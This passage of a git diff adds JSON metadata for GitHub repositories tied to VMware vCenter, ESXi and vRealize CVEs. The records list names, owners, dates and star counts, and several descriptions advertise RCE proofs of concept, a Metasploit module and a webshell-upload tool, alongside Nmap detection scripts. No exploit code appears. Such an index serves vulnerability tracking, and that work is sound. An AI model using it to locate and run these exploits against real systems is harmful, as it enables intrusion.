+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 32,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 342132841,
+ "name": "CVE-2021-21972",
+ "full_name": "Udyz\/CVE-2021-21972",
+ "owner": {
+ "login": "Udyz",
+ "id": 39673284,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39673284?v=4",
+ "html_url": "https:\/\/github.com\/Udyz"
+ },
+ "html_url": "https:\/\/github.com\/Udyz\/CVE-2021-21972",
+ "description": "CVE-2021-21972 vCenter-6.5-7.0 RCE POC",
+ "fork": false,
+ "created_at": "2021-02-25T05:25:46Z",
+ "updated_at": "2023-09-28T11:25:15Z",
+ "pushed_at": "2021-02-25T05:28:16Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 342156654,
+ "name": "VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972",
+ "full_name": "conjojo\/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972",
+ "owner": {
+ "login": "conjojo",
+ "id": 79626719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79626719?v=4",
+ "html_url": "https:\/\/github.com\/conjojo"
+ },
+ "html_url": "https:\/\/github.com\/conjojo\/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972",
+ "description": "VMware vCenter 未授权RCE(CVE-2021-21972)",
+ "fork": false,
+ "created_at": "2021-02-25T07:17:21Z",
+ "updated_at": "2024-06-21T00:09:09Z",
+ "pushed_at": "2021-02-25T09:54:53Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 342190619,
+ "name": "CVE-2021-21972",
+ "full_name": "L-pin\/CVE-2021-21972",
+ "owner": {
+ "login": "L-pin",
+ "id": 23657203,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23657203?v=4",
+ "html_url": "https:\/\/github.com\/L-pin"
+ },
+ "html_url": "https:\/\/github.com\/L-pin\/CVE-2021-21972",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-25T09:28:17Z",
+ "updated_at": "2021-02-26T01:57:28Z",
+ "pushed_at": "2021-02-26T01:57:26Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 342203695,
+ "name": "CVE-2021-21972",
+ "full_name": "B1anda0\/CVE-2021-21972",
+ "owner": {
+ "login": "B1anda0",
+ "id": 74232513,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74232513?v=4",
+ "html_url": "https:\/\/github.com\/B1anda0"
+ },
+ "html_url": "https:\/\/github.com\/B1anda0\/CVE-2021-21972",
+ "description": "VMware vCenter Server远程代码执行漏洞 (CVE-2021-21972)批量检测脚本",
+ "fork": false,
+ "created_at": "2021-02-25T10:16:20Z",
+ "updated_at": "2023-11-26T03:08:22Z",
+ "pushed_at": "2021-02-25T10:26:53Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 342246923,
+ "name": "CVE-2021-21972",
+ "full_name": "renini\/CVE-2021-21972",
+ "owner": {
+ "login": "renini",
+ "id": 1587083,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1587083?v=4",
+ "html_url": "https:\/\/github.com\/renini"
+ },
+ "html_url": "https:\/\/github.com\/renini\/CVE-2021-21972",
+ "description": "CVE-2021-21972",
+ "fork": false,
+ "created_at": "2021-02-25T13:04:37Z",
+ "updated_at": "2021-07-14T14:37:02Z",
+ "pushed_at": "2021-02-25T13:11:43Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 342339317,
+ "name": "cve-2021-21972",
+ "full_name": "stevenp322\/cve-2021-21972",
+ "owner": {
+ "login": "stevenp322",
+ "id": 6853588,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6853588?v=4",
+ "html_url": "https:\/\/github.com\/stevenp322"
+ },
+ "html_url": "https:\/\/github.com\/stevenp322\/cve-2021-21972",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-25T18:22:34Z",
+ "updated_at": "2021-08-27T21:28:19Z",
+ "pushed_at": "2021-08-27T21:28:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 342706243,
+ "name": "CVE-2021-21972",
+ "full_name": "GuayoyoCyber\/CVE-2021-21972",
+ "owner": {
+ "login": "GuayoyoCyber",
+ "id": 17362318,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17362318?v=4",
+ "html_url": "https:\/\/github.com\/GuayoyoCyber"
+ },
+ "html_url": "https:\/\/github.com\/GuayoyoCyber\/CVE-2021-21972",
+ "description": "Nmap script to check vulnerability CVE-2021-21972",
+ "fork": false,
+ "created_at": "2021-02-26T21:30:50Z",
+ "updated_at": "2023-09-28T11:25:18Z",
+ "pushed_at": "2021-03-03T13:54:38Z",
+ "stargazers_count": 29,
+ "watchers_count": 29,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-21972",
+ "nmap",
+ "nmap-script"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 29,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 342822880,
+ "name": "Detect-CVE-2021-21972",
+ "full_name": "JMousqueton\/Detect-CVE-2021-21972",
+ "owner": {
+ "login": "JMousqueton",
+ "id": 4148567,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4148567?v=4",
+ "html_url": "https:\/\/github.com\/JMousqueton"
+ },
+ "html_url": "https:\/\/github.com\/JMousqueton\/Detect-CVE-2021-21972",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-27T09:53:57Z",
+ "updated_at": "2021-02-27T10:00:17Z",
+ "pushed_at": "2021-02-27T10:00:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 342829114,
+ "name": "VMware_vCenter_CVE-2021-21972",
+ "full_name": "robwillisinfo\/VMware_vCenter_CVE-2021-21972",
+ "owner": {
+ "login": "robwillisinfo",
+ "id": 24982882,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24982882?v=4",
+ "html_url": "https:\/\/github.com\/robwillisinfo"
+ },
+ "html_url": "https:\/\/github.com\/robwillisinfo\/VMware_vCenter_CVE-2021-21972",
+ "description": "VMware vCenter CVE-2021-21972 Tools",
+ "fork": false,
+ "created_at": "2021-02-27T10:27:04Z",
+ "updated_at": "2023-01-05T08:31:41Z",
+ "pushed_at": "2021-02-27T10:37:32Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 343440136,
+ "name": "vcenter_rce",
+ "full_name": "Ma1Dong\/vcenter_rce",
+ "owner": {
+ "login": "Ma1Dong",
+ "id": 52943794,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52943794?v=4",
+ "html_url": "https:\/\/github.com\/Ma1Dong"
+ },
+ "html_url": "https:\/\/github.com\/Ma1Dong\/vcenter_rce",
+ "description": "漏洞利用,Vmware vCenter 6.5-7.0 RCE(CVE-2021-21972),上传冰蝎3,getshell",
+ "fork": false,
+ "created_at": "2021-03-01T14:14:01Z",
+ "updated_at": "2024-06-21T00:09:09Z",
+ "pushed_at": "2021-03-01T14:28:30Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 343983949,
+ "name": "cve-2021-21972",
+ "full_name": "d3sh1n\/cve-2021-21972",
+ "owner": {
+ "login": "d3sh1n",
+ "id": 78736442,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78736442?v=4",
+ "html_url": "https:\/\/github.com\/d3sh1n"
+ },
+ "html_url": "https:\/\/github.com\/d3sh1n\/cve-2021-21972",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-03T03:01:46Z",
+ "updated_at": "2021-12-27T05:40:13Z",
+ "pushed_at": "2021-03-11T08:21:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 344383637,
+ "name": "CVE-2021-21972",
+ "full_name": "ByZain\/CVE-2021-21972",
+ "owner": {
+ "login": "ByZain",
+ "id": 62633744,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62633744?v=4",
+ "html_url": "https:\/\/github.com\/ByZain"
+ },
+ "html_url": "https:\/\/github.com\/ByZain\/CVE-2021-21972",
+ "description": "CVE-2021-21972 related vulnerability code",
+ "fork": false,
+ "created_at": "2021-03-04T07:14:10Z",
+ "updated_at": "2022-09-13T10:55:17Z",
+ "pushed_at": "2021-03-04T09:17:01Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 345396191,
+ "name": "CVE-2021-21972",
+ "full_name": "TaroballzChen\/CVE-2021-21972",
+ "owner": {
+ "login": "TaroballzChen",
+ "id": 27862593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4",
+ "html_url": "https:\/\/github.com\/TaroballzChen"
+ },
+ "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2021-21972",
+ "description": "CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script",
+ "fork": false,
+ "created_at": "2021-03-07T16:30:36Z",
+ "updated_at": "2023-09-28T11:25:34Z",
+ "pushed_at": "2021-03-07T17:12:55Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 354282443,
+ "name": "CVE-2021-21972",
+ "full_name": "ZTK-009\/CVE-2021-21972",
+ "owner": {
+ "login": "ZTK-009",
+ "id": 29515145,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29515145?v=4",
+ "html_url": "https:\/\/github.com\/ZTK-009"
+ },
+ "html_url": "https:\/\/github.com\/ZTK-009\/CVE-2021-21972",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-03T12:09:53Z",
+ "updated_at": "2021-04-03T12:10:03Z",
+ "pushed_at": "2021-04-03T12:10:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 355150639,
+ "name": "CVE-2021-21972",
+ "full_name": "murataydemir\/CVE-2021-21972",
+ "owner": {
+ "login": "murataydemir",
+ "id": 16391655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4",
+ "html_url": "https:\/\/github.com\/murataydemir"
+ },
+ "html_url": "https:\/\/github.com\/murataydemir\/CVE-2021-21972",
+ "description": "[CVE-2021-21972] VMware vSphere Client Unauthorized File Upload to Remote Code Execution (RCE)",
+ "fork": false,
+ "created_at": "2021-04-06T10:38:40Z",
+ "updated_at": "2023-09-28T11:26:31Z",
+ "pushed_at": "2021-04-06T16:15:56Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 360539179,
+ "name": "vSphereyeeter",
+ "full_name": "pettyhacks\/vSphereyeeter",
+ "owner": {
+ "login": "pettyhacks",
+ "id": 82959253,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82959253?v=4",
+ "html_url": "https:\/\/github.com\/pettyhacks"
+ },
+ "html_url": "https:\/\/github.com\/pettyhacks\/vSphereyeeter",
+ "description": "POC exploit for CVE-2021-21972",
+ "fork": false,
+ "created_at": "2021-04-22T14:00:38Z",
+ "updated_at": "2023-02-05T10:19:01Z",
+ "pushed_at": "2022-07-21T20:14:19Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 389736878,
+ "name": "CVE-2021-21972",
+ "full_name": "haidv35\/CVE-2021-21972",
+ "owner": {
+ "login": "haidv35",
+ "id": 20736458,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20736458?v=4",
+ "html_url": "https:\/\/github.com\/haidv35"
+ },
+ "html_url": "https:\/\/github.com\/haidv35\/CVE-2021-21972",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-26T18:48:28Z",
+ "updated_at": "2023-03-08T02:48:17Z",
+ "pushed_at": "2021-08-02T17:45:59Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 413216838,
+ "name": "CVE-2021-21972",
+ "full_name": "orangmuda\/CVE-2021-21972",
+ "owner": {
+ "login": "orangmuda",
+ "id": 91846073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4",
+ "html_url": "https:\/\/github.com\/orangmuda"
+ },
+ "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-21972",
+ "description": "CVE-2021-21972 – ᴠᴍᴡᴀʀᴇ ᴄʟɪᴇɴᴛ ᴜɴᴀᴜᴛʜᴏʀɪᴢᴇᴅ ᴄᴏᴅᴇ ɪɴᴊᴇᴄᴛɪᴏɴ (ʀᴄᴇ)",
+ "fork": false,
+ "created_at": "2021-10-03T23:03:11Z",
+ "updated_at": "2024-06-21T00:09:34Z",
+ "pushed_at": "2022-03-07T14:12:38Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-21972",
+ "exploit",
+ "remote-code-execution",
+ "vmware"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 492815004,
+ "name": "cve-2021-21972_PoC",
+ "full_name": "user16-et\/cve-2021-21972_PoC",
+ "owner": {
+ "login": "user16-et",
+ "id": 60484451,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60484451?v=4",
+ "html_url": "https:\/\/github.com\/user16-et"
+ },
+ "html_url": "https:\/\/github.com\/user16-et\/cve-2021-21972_PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-16T11:57:42Z",
+ "updated_at": "2022-05-27T06:52:45Z",
+ "pushed_at": "2022-05-27T06:52:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 545257457,
+ "name": "VcenterKiller",
+ "full_name": "Schira4396\/VcenterKiller",
+ "owner": {
+ "login": "Schira4396",
+ "id": 57404930,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57404930?v=4",
+ "html_url": "https:\/\/github.com\/Schira4396"
+ },
+ "html_url": "https:\/\/github.com\/Schira4396\/VcenterKiller",
+ "description": "一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972\/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接",
+ "fork": false,
+ "created_at": "2022-10-04T03:39:27Z",
+ "updated_at": "2024-06-21T14:57:58Z",
+ "pushed_at": "2024-04-25T06:09:38Z",
+ "stargazers_count": 1271,
+ "watchers_count": 1271,
+ "has_discussions": false,
+ "forks_count": 161,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "go",
+ "golang",
+ "log4j",
+ "log4shell",
+ "scan",
+ "vcenter"
+ ],
+ "visibility": "public",
+ "forks": 161,
+ "watchers": 1271,
+ "score": 0,
+ "subscribers_count": 14
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21973.json b/2021/CVE-2021-21973.json
new file mode 100644
index 0000000000..86594d1a3f
--- /dev/null
+++ b/2021/CVE-2021-21973.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 348167084,
+ "name": "CVE-2021-21973-Automateme",
+ "full_name": "freakanonymous\/CVE-2021-21973-Automateme",
+ "owner": {
+ "login": "freakanonymous",
+ "id": 77834590,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77834590?v=4",
+ "html_url": "https:\/\/github.com\/freakanonymous"
+ },
+ "html_url": "https:\/\/github.com\/freakanonymous\/CVE-2021-21973-Automateme",
+ "description": "automate me!",
+ "fork": false,
+ "created_at": "2021-03-16T00:50:15Z",
+ "updated_at": "2023-09-28T11:25:49Z",
+ "pushed_at": "2021-03-16T00:51:04Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21974.json b/2021/CVE-2021-21974.json
new file mode 100644
index 0000000000..80187b92b9
--- /dev/null
+++ b/2021/CVE-2021-21974.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 370771984,
+ "name": "CVE-2021-21974",
+ "full_name": "Shadow0ps\/CVE-2021-21974",
+ "owner": {
+ "login": "Shadow0ps",
+ "id": 6516174,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6516174?v=4",
+ "html_url": "https:\/\/github.com\/Shadow0ps"
+ },
+ "html_url": "https:\/\/github.com\/Shadow0ps\/CVE-2021-21974",
+ "description": "POC for CVE-2021-21974 VMWare ESXi RCE Exploit",
+ "fork": false,
+ "created_at": "2021-05-25T17:14:38Z",
+ "updated_at": "2024-06-21T00:09:19Z",
+ "pushed_at": "2021-07-09T19:38:41Z",
+ "stargazers_count": 171,
+ "watchers_count": 171,
+ "has_discussions": false,
+ "forks_count": 43,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 43,
+ "watchers": 171,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 597541159,
+ "name": "Feb2023-CVE-2021-21974-OSINT",
+ "full_name": "n2x4\/Feb2023-CVE-2021-21974-OSINT",
+ "owner": {
+ "login": "n2x4",
+ "id": 31667936,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31667936?v=4",
+ "html_url": "https:\/\/github.com\/n2x4"
+ },
+ "html_url": "https:\/\/github.com\/n2x4\/Feb2023-CVE-2021-21974-OSINT",
+ "description": "Analysis of the ransom demands from Shodan results",
+ "fork": false,
+ "created_at": "2023-02-04T21:23:20Z",
+ "updated_at": "2023-02-06T01:29:38Z",
+ "pushed_at": "2023-02-06T03:46:55Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 599047842,
+ "name": "ESXi-Ransomware-Scanner-mi",
+ "full_name": "CYBERTHREATANALYSIS\/ESXi-Ransomware-Scanner-mi",
+ "owner": {
+ "login": "CYBERTHREATANALYSIS",
+ "id": 124778371,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124778371?v=4",
+ "html_url": "https:\/\/github.com\/CYBERTHREATANALYSIS"
+ },
+ "html_url": "https:\/\/github.com\/CYBERTHREATANALYSIS\/ESXi-Ransomware-Scanner-mi",
+ "description": "ESXi EZ - A custom scanner that takes list of IPs either in JSON, CSV or individually and checks for infection CVE-2021-21974",
+ "fork": false,
+ "created_at": "2023-02-08T10:46:37Z",
+ "updated_at": "2023-12-05T21:08:38Z",
+ "pushed_at": "2023-02-08T11:28:31Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 706986548,
+ "name": "cve-2021-21974",
+ "full_name": "hateme021202\/cve-2021-21974",
+ "owner": {
+ "login": "hateme021202",
+ "id": 86812439,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86812439?v=4",
+ "html_url": "https:\/\/github.com\/hateme021202"
+ },
+ "html_url": "https:\/\/github.com\/hateme021202\/cve-2021-21974",
+ "description": "Nmap NSE script for cve-2021-21974",
+ "fork": false,
+ "created_at": "2023-10-19T02:03:44Z",
+ "updated_at": "2023-10-19T02:05:10Z",
+ "pushed_at": "2023-10-19T02:05:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-21975.json b/2021/CVE-2021-21975.json
new file mode 100644
index 0000000000..138830abf4
--- /dev/null
+++ b/2021/CVE-2021-21975.json
@@ -0,0 +1,253 @@
+[
+ {
+ "id": 353356863,
+ "name": "VMWare-vRealize-SSRF",
+ "full_name": "Henry4E36\/VMWare-vRealize-SSRF",
+ "owner": {
+ "login": "Henry4E36",
+ "id": 41940481,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4",
+ "html_url": "https:\/\/github.com\/Henry4E36"
+ },
+ "html_url": "https:\/\/github.com\/Henry4E36\/VMWare-vRealize-SSRF",
+ "description": "VMWare vRealize SSRF-CVE-2021-21975",
+ "fork": false,
+ "created_at": "2021-03-31T12:56:09Z",
+ "updated_at": "2023-09-28T11:26:20Z",
+ "pushed_at": "2021-04-02T08:53:39Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 353368245,
+ "name": "CVE-2021-21975",
+ "full_name": "dorkerdevil\/CVE-2021-21975",
+ "owner": {
+ "login": "dorkerdevil",
+ "id": 15796745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4",
+ "html_url": "https:\/\/github.com\/dorkerdevil"
+ },
+ "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-21975",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-31T13:33:45Z",
+ "updated_at": "2023-09-28T11:26:20Z",
+ "pushed_at": "2021-07-04T10:58:31Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 353407250,
+ "name": "CVE-2021-21975",
+ "full_name": "Al1ex\/CVE-2021-21975",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-21975",
+ "description": "CVE-2021-21975 vRealize Operations Manager SSRF",
+ "fork": false,
+ "created_at": "2021-03-31T15:40:09Z",
+ "updated_at": "2023-09-28T11:26:20Z",
+ "pushed_at": "2021-03-31T15:50:27Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-21975",
+ "ssrf",
+ "vrealize-operations-manager"
+ ],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 353534448,
+ "name": "exp_hub",
+ "full_name": "TheTh1nk3r\/exp_hub",
+ "owner": {
+ "login": "TheTh1nk3r",
+ "id": 42456962,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42456962?v=4",
+ "html_url": "https:\/\/github.com\/TheTh1nk3r"
+ },
+ "html_url": "https:\/\/github.com\/TheTh1nk3r\/exp_hub",
+ "description": "漏洞复现与poc收集,CVE-2021-21975,cve-2021-22005,CVE-2021-26295,VMware vCenter任意文件读取",
+ "fork": false,
+ "created_at": "2021-04-01T01:14:20Z",
+ "updated_at": "2023-11-18T08:31:30Z",
+ "pushed_at": "2021-09-30T11:14:58Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 353836398,
+ "name": "CVE-2021-21975",
+ "full_name": "GuayoyoCyber\/CVE-2021-21975",
+ "owner": {
+ "login": "GuayoyoCyber",
+ "id": 17362318,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17362318?v=4",
+ "html_url": "https:\/\/github.com\/GuayoyoCyber"
+ },
+ "html_url": "https:\/\/github.com\/GuayoyoCyber\/CVE-2021-21975",
+ "description": "Nmap script to check vulnerability CVE-2021-21975",
+ "fork": false,
+ "created_at": "2021-04-01T21:59:05Z",
